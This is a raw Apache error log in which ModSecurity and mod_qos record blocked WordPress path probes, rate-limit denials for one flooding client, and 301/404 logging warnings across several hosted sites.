[Tue May 26 20:00:52.475127 2026] [security2:error] [pid 112029:tid 112210] [client 113.172.242.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWunKFW0C-ajaCsyFc9BQAAAT0"]
[Tue May 26 20:00:52.677728 2026] [security2:error] [pid 112029:tid 112207] [client 103.163.220.19:46597] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/edit-post/"] [unique_id "ahWunKFW0C-ajaCsyFc9EAAAATo"]
[Tue May 26 20:00:53.106395 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rDgAAAM4
[Tue May 26 20:00:53.106406 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rDQAAAOE
[Tue May 26 20:00:53.107795 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:46350] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rDwAAAMU
[Tue May 26 20:00:53.110062 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rEAAAAMc
[Tue May 26 20:00:53.110166 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rEQAAANk
[Tue May 26 20:00:53.111842 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:46454] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rEgAAAJ4
[Tue May 26 20:00:53.116951 2026] [qos:error] [pid 112029:tid 112170] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9OAAAARU
[Tue May 26 20:00:53.118399 2026] [qos:error] [pid 112029:tid 112230] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9OQAAAVE
[Tue May 26 20:00:53.118540 2026] [qos:error] [pid 112029:tid 112169] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9OgAAARQ
[Tue May 26 20:00:53.118636 2026] [qos:error] [pid 112029:tid 112185] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9PQAAASQ
[Tue May 26 20:00:53.118660 2026] [qos:error] [pid 112029:tid 112196] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9OwAAAS8
[Tue May 26 20:00:53.118794 2026] [qos:error] [pid 112029:tid 112249] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9PgAAAWQ
[Tue May 26 20:00:53.176392 2026] [security2:error] [pid 112029:tid 112166] [client 103.163.220.52:59273] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahWunaFW0C-ajaCsyFc9QQAAARE"]
[Tue May 26 20:00:53.264438 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rHAAAANE
[Tue May 26 20:00:53.265190 2026] [qos:error] [pid 112029:tid 112282] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunaFW0C-ajaCsyFc9RwAAAYU
[Tue May 26 20:00:53.265463 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:46454] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rHQAAAN4
[Tue May 26 20:00:53.267386 2026] [qos:error] [pid 112029:tid 112240] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9SAAAAVs
[Tue May 26 20:00:53.267761 2026] [qos:error] [pid 112029:tid 112195] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9SQAAAS4
[Tue May 26 20:00:53.267947 2026] [qos:error] [pid 112029:tid 112184] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9SgAAASM
[Tue May 26 20:00:53.273022 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:46334] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rIQAAAJY
[Tue May 26 20:00:53.280323 2026] [qos:error] [pid 112029:tid 112183] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9TgAAASI
[Tue May 26 20:00:53.280657 2026] [qos:error] [pid 106517:tid 106754] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rIgAAAOw
[Tue May 26 20:00:53.286749 2026] [security2:error] [pid 112029:tid 112177] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc80AAAARw"]
[Tue May 26 20:00:53.288758 2026] [security2:error] [pid 112029:tid 112280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc82wAAAYM"]
[Tue May 26 20:00:53.295613 2026] [security2:error] [pid 112029:tid 112214] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc82AAAAUE"]
[Tue May 26 20:00:53.301292 2026] [security2:error] [pid 112029:tid 112217] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc84AAAAUQ"]
[Tue May 26 20:00:53.311862 2026] [security2:error] [pid 112029:tid 112247] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc83wAAAWI"]
[Tue May 26 20:00:53.314972 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qcwAAAOA"]
[Tue May 26 20:00:53.328739 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qcgAAAL0"]
[Tue May 26 20:00:53.334830 2026] [security2:error] [pid 112029:tid 112263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc83AAAAXI"]
[Tue May 26 20:00:53.341665 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qjAAAANM"]
[Tue May 26 20:00:53.342229 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qdQAAALg"]
[Tue May 26 20:00:53.343305 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qjwAAAMk"]
[Tue May 26 20:00:53.344794 2026] [security2:error] [pid 112029:tid 112182] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc82gAAASE"]
[Tue May 26 20:00:53.349832 2026] [security2:error] [pid 112029:tid 112254] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc87AAAAWk"]
[Tue May 26 20:00:53.363869 2026] [security2:error] [pid 106517:tid 106749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qdgAAAOc"]
[Tue May 26 20:00:53.367655 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1qyAAAANc"]
[Tue May 26 20:00:53.375171 2026] [security2:error] [pid 112029:tid 112278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc83QAAAYE"]
[Tue May 26 20:00:53.377308 2026] [security2:error] [pid 112029:tid 112192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc84wAAASs"]
[Tue May 26 20:00:53.381979 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q0QAAAM8"]
[Tue May 26 20:00:53.389247 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qjgAAAP0"]
[Tue May 26 20:00:53.399491 2026] [security2:error] [pid 112029:tid 112189] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8-wAAASg"]
[Tue May 26 20:00:53.399693 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1qxQAAAQE"]
[Tue May 26 20:00:53.400901 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qdwAAANY"]
[Tue May 26 20:00:53.404601 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q2gAAAJU"]
[Tue May 26 20:00:53.414321 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q1gAAAMo"]
[Tue May 26 20:00:53.418536 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q5QAAAMY"]
[Tue May 26 20:00:53.453191 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q2QAAAMA"]
[Tue May 26 20:00:53.454778 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q7wAAAO4"]
[Tue May 26 20:00:53.455096 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q2AAAANI"]
[Tue May 26 20:00:53.459787 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q3QAAALU"]
[Tue May 26 20:00:53.463883 2026] [security2:error] [pid 112029:tid 112273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9JQAAAXw"]
[Tue May 26 20:00:53.464064 2026] [security2:error] [pid 112029:tid 112186] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9IwAAASU"]
[Tue May 26 20:00:53.467928 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q_AAAAPg"]
[Tue May 26 20:00:53.619324 2026] [qos:error] [pid 112029:tid 112225] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9dAAAAUw
[Tue May 26 20:00:53.619777 2026] [qos:error] [pid 112029:tid 112199] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9dgAAATI
[Tue May 26 20:00:53.622083 2026] [qos:error] [pid 112029:tid 112285] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9eAAAAYg
[Tue May 26 20:00:53.622454 2026] [qos:error] [pid 112029:tid 112277] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWunaFW0C-ajaCsyFc9ewAAAYA
[Tue May 26 20:00:53.624016 2026] [qos:error] [pid 106517:tid 106695] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rdAAAALE
[Tue May 26 20:00:53.625838 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rdQAAANU
[Tue May 26 20:00:53.626226 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rdgAAAMc
[Tue May 26 20:00:53.626297 2026] [qos:error] [pid 112029:tid 112211] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9fgAAAT4
[Tue May 26 20:00:53.628417 2026] [qos:error] [pid 112029:tid 112230] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9gQAAAVE
[Tue May 26 20:00:53.633729 2026] [qos:error] [pid 112029:tid 112278] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunaFW0C-ajaCsyFc9hwAAAYE
[Tue May 26 20:00:53.669090 2026] [security2:error] [pid 112029:tid 112235] [client 103.163.220.18:51581] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/images/"] [unique_id "ahWunaFW0C-ajaCsyFc9iAAAAVY"]
[Tue May 26 20:00:53.797568 2026] [security2:error] [pid 106517:tid 106751] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rJwAAAOk"]
[Tue May 26 20:00:53.919446 2026] [qos:error] [pid 112029:tid 112168] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunaFW0C-ajaCsyFc9kAAAARM
[Tue May 26 20:00:53.922662 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rfwAAAMc
[Tue May 26 20:00:53.924885 2026] [qos:error] [pid 112029:tid 112284] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunaFW0C-ajaCsyFc9kQAAAYc
[Tue May 26 20:00:53.924973 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rgAAAAPM
[Tue May 26 20:00:53.931374 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rgQAAAN4
[Tue May 26 20:00:53.933398 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rggAAAOk
[Tue May 26 20:00:53.934166 2026] [qos:error] [pid 112029:tid 112202] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunaFW0C-ajaCsyFc9kgAAATU
[Tue May 26 20:00:53.935762 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rgwAAAMg
[Tue May 26 20:00:53.936176 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rhAAAAJ8
[Tue May 26 20:00:53.936501 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunYZZc2DoU1lPnP1rhQAAAMw
[Tue May 26 20:00:54.067993 2026] [qos:error] [pid 112029:tid 112238] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9lQAAAVk
[Tue May 26 20:00:54.074374 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rjQAAAN4
[Tue May 26 20:00:54.075414 2026] [qos:error] [pid 112029:tid 112286] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9lgAAAYk
[Tue May 26 20:00:54.076444 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rjgAAAOk
[Tue May 26 20:00:54.085415 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rkAAAAJ8
[Tue May 26 20:00:54.085848 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rjwAAAMg
[Tue May 26 20:00:54.090888 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rkQAAALM
[Tue May 26 20:00:54.093966 2026] [qos:error] [pid 112029:tid 112267] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9lwAAAXY
[Tue May 26 20:00:54.095562 2026] [qos:error] [pid 106517:tid 106699] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rkgAAALU
[Tue May 26 20:00:54.179115 2026] [security2:error] [pid 112029:tid 112199] [client 103.163.220.34:60289] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Text/Diff/Renderer/"] [unique_id "ahWunqFW0C-ajaCsyFc9oQAAATI"]
[Tue May 26 20:00:54.218056 2026] [qos:error] [pid 112029:tid 112188] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9ogAAASc
[Tue May 26 20:00:54.226710 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rlgAAAK8
[Tue May 26 20:00:54.227557 2026] [qos:error] [pid 112029:tid 112204] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9owAAATc
